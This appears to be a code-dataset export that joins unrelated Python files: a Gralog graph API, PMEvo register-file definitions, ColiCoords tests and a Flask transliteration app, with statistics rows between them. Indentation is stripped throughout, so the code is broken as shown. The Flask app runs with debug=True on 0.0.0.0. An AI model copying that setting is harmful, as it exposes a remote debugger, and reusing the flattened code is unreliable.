id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
# end manilupative functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
line = line = "setEdgeContour#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
# warning!! importing as pure TGF will mean edge id's will
# be lost. This will result in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
return(self.getAllVertices())
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdges(self):
return(self.getAllEdges())
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
# return: list of Edge objects with id's only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
# internally: fill edge property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
line = line + vid
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestEdge(self):
line = "requestEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(vid)
return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
try:
rank = int(args[0])
except:
pass
if len(args) > 0 and rank != None:
rank = int(args[0])
args = args[1:]
argString = ""
if rank != None:
argString += "#"+str(rank).rstrip()
for key in sorted(self.variablesToTrack.keys()):
term = "#("+str(key).rstrip()+"=" + \ str(self.variablesToTrack[key]).rstrip()+")"
argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
if (type(x) == list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
| 35.870919 | 203 | 0.460522 | 4,056 | 47,242 | 5.345168 | 0.112919 | 0.023524 | 0.032934 | 0.029751 | 0.445987 | 0.398293 | 0.370111 | 0.340821 | 0.329151 | 0.314299 | 0 | 0.005918 | 0.434846 | 47,242 | 1,316 | 204 | 35.898176 | 0.806098 | 0 | 0 | 0.466251 | 0 | 0 | 0.035761 | 0.003676 | 0.001038 | 0 | 0 | 0.00076 | 0 | 0 | null | null | 0.004154 | 0.007269 | null | null | 0.053998 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe759c78dfaceadf537006e1685f7155df52a71a | 10,073 | py | Python | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 6 | 2020-04-21T12:16:19.000Z | 2022-02-10T09:18:08.000Z | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 1 | 2021-12-07T13:09:53.000Z | 2021-12-07T13:09:53.000Z | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 2 | 2021-03-30T12:40:01.000Z | 2021-11-23T15:49:50.000Z | #! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
self.next_indices = defaultdict(lambda:0)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
class AArch64_RegisterFile(RegisterFile):
registers = {
"G": # general puprose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
| 54.448649 | 111 | 0.37119 | 1,145 | 10,073 | 3.237555 | 0.367686 | 0.01133 | 0.01079 | 0.015107 | 0.194227 | 0.132722 | 0.132722 | 0.116536 | 0.116536 | 0.116536 | 0 | 0.194602 | 0.33426 | 10,073 | 184 | 112 | 54.744565 | 0.358187 | 0.157054 | 0 | 0.148936 | 0 | 0 | 0.255478 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049645 | false | 0 | 0.021277 | 0.014184 | 0.134752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe79e20af0abaadf27ef0edd6010a9d9587df465 | 2,019 | py | Python | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 18 | 2018-09-11T01:14:31.000Z | 2021-12-27T10:21:59.000Z | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 77 | 2018-09-19T09:28:33.000Z | 2021-11-12T13:31:50.000Z | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 8 | 2019-06-17T16:02:32.000Z | 2021-06-30T23:31:17.000Z | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
#todo check order
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
if __name__ == '__main__':
unittest.main() | 30.590909 | 93 | 0.618128 | 266 | 2,019 | 4.522556 | 0.274436 | 0.099751 | 0.036575 | 0.0399 | 0.382377 | 0.276808 | 0.276808 | 0.276808 | 0.181214 | 0.181214 | 0 | 0.042056 | 0.258049 | 2,019 | 66 | 94 | 30.590909 | 0.761015 | 0.007925 | 0 | 0.183673 | 0 | 0 | 0.016512 | 0 | 0 | 0 | 0 | 0.015152 | 0.244898 | 1 | 0.122449 | false | 0 | 0.122449 | 0 | 0.285714 | 0.081633 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe7d3ca44a30c1b45cb010d74a7365ccccfb69bc | 691 | py | Python | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Flask 객체 선언, 파라미터로 어플리케이션 패키지의 이름을 넣어 준다.
app.config['JSON_AS_ASCII'] = False # 한글 데이터 전송을 위해서 설정해 준다.
@app.route("/transliterate", methods=['GET'])
def transliterate():
input = request.args.get('input')
output = transliteration.run(input)
learned = transliteration.is_learned(input)
print(input, learned)
return jsonify(output)
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
